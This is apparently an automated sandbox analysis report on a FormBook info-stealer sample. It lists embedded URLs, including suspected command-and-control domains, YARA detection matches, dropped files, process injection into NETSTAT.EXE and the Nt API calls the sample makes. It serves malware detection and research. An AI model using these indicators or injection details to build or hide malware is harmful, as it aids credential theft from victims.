          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366500402.00000000052EB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366349990.00000000011ED000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnC
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.pro
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.pro/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.pro/k8b/www.alriyadh-ksa.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.proReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.com/k8b/www.xn--ucko5bzcwf3b2c.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)jl-
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.367808589.00000000052E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/1
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3j:l-
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Ej$l
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.367879513.00000000052E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Nj
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0P
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/1
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Nj
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rj
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.367879513.00000000052E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/sk-s
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.com/k8b/www.dancoimage.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.online/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.online/k8b/www.lamparacuerda.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.onlineReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.com/k8b/www.coin-1234.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.net
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.net/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.net/k8b/www.salestalentforhire.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.netReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368281987.00000000052FB000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000003.364937278.00000000052FB000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000003.364884389.00000000052FB000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000003.364894639.00000000052FB000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.com/k8b/www.infi88.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.com/k8b/www.mensajera-radio.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366937932.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnQl
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366861134.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cna
          Source: NETSTAT.EXE, 0000000C.00000002.630991650.0000000002F38000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Dropped file: C:\Users\user\AppData\Roaming\L6725004\L67logri.ini
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Dropped file: C:\Users\user\AppData\Roaming\L6725004\L67logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_052B0BEE NtQuerySystemInformation,0_2_052B0BEE
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_052B0BB3 NtQuerySystemInformation,0_2_052B0BB3
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419C90 NtCreateFile,4_2_00419C90
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419D40 NtReadFile,4_2_00419D40
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419DC0 NtClose,4_2_00419DC0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419E70 NtAllocateVirtualMemory,4_2_00419E70
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419D3A NtReadFile,4_2_00419D3A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01729910
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017299A0 NtCreateSection,LdrInitializeThunk,4_2_017299A0
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017298F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017295D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017297A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017296E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729950 NtQueueApcThread
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017299D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_0172B040 NtSuspendThread
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729820 NtEnumerateKey
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017298A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729B00 NtSetValueKey
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_0172A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729A10 NtQuerySection
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729560 NtWriteFile
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_0172AD30 NtSetContextThread
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017295F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_0172A770 NtOpenThread
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729770 NtSetInformationFile
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729760 NtOpenProcess
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_0172A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729FE0 NtCreateMutant
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729650 NtQueryValueKey
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_01729610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: 4_2_017296D0 NtCreateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9770 NtSetInformationFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9610 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9560 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038AA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9A10 NtQuerySection
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9A20 NtResumeThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038AB040 NtSuspendThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038AA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9760 NtOpenProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038AA770 NtOpenThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038A9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_038AAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_02F89E70 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_02F89C90 NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_02F89DC0 NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_02F89D40 NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_02F89D3A NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0386B150 appears 145 times
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe Code function: String function: 016EB150 appears 145 times
Source: vyac9eSGFdsBaas.exe, 00000000.00000000.364362668.00000000007B4000.00000002.00020000.sdmp Binary or memory string: OriginalFilename4TQ.exe, vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398412806.0000000006E50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398404155.0000000006E30000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWinRar.dll. vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000000.00000002.402157774.0000000007A70000.00000002.00000001.sdmp Binary or memory string: originalfilename vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000000.00000002.402157774.0000000007A70000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398745998.0000000007040000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameB2B.exe4 vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000000.00000002.399135892.0000000007970000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000003.00000002.387024042.00000000001F4000.00000002.00020000.sdmp Binary or memory string: OriginalFilename4TQ.exe, vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000004.00000002.436577205.000000000196F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000004.00000002.437188886.0000000001A00000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs vyac9eSGFdsBaas.exe
Source: vyac9eSGFdsBaas.exe, 00000004.00000002.432351350.0000000000CA4000.00000002.00020000.sdmp Binary or memory string: OriginalFilena